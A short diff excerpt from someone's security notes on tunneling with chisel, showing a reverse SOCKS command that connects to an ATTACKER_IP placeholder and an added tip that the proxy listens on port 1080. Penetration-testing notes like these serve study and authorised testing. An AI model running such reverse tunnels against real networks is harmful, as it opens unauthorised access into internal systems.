fanicia/security-notes/notes/port-forwarding-ssh-tunneling/chisel.md

 ```
 chisel client ${ATTACKER_IP}:${ATTACKER_PORT} R:socks
 ```
-This creates a SOCKS tunnel (bound to 1080 by default).
+This creates a SOCKS tunnel (bound to 1080 by default). <--- USE 1080 as proxy port, not `${ATTACKER_PORT}`.
+Also when setting up the proxy in the browser!

 If you want it to not block your current shell, do: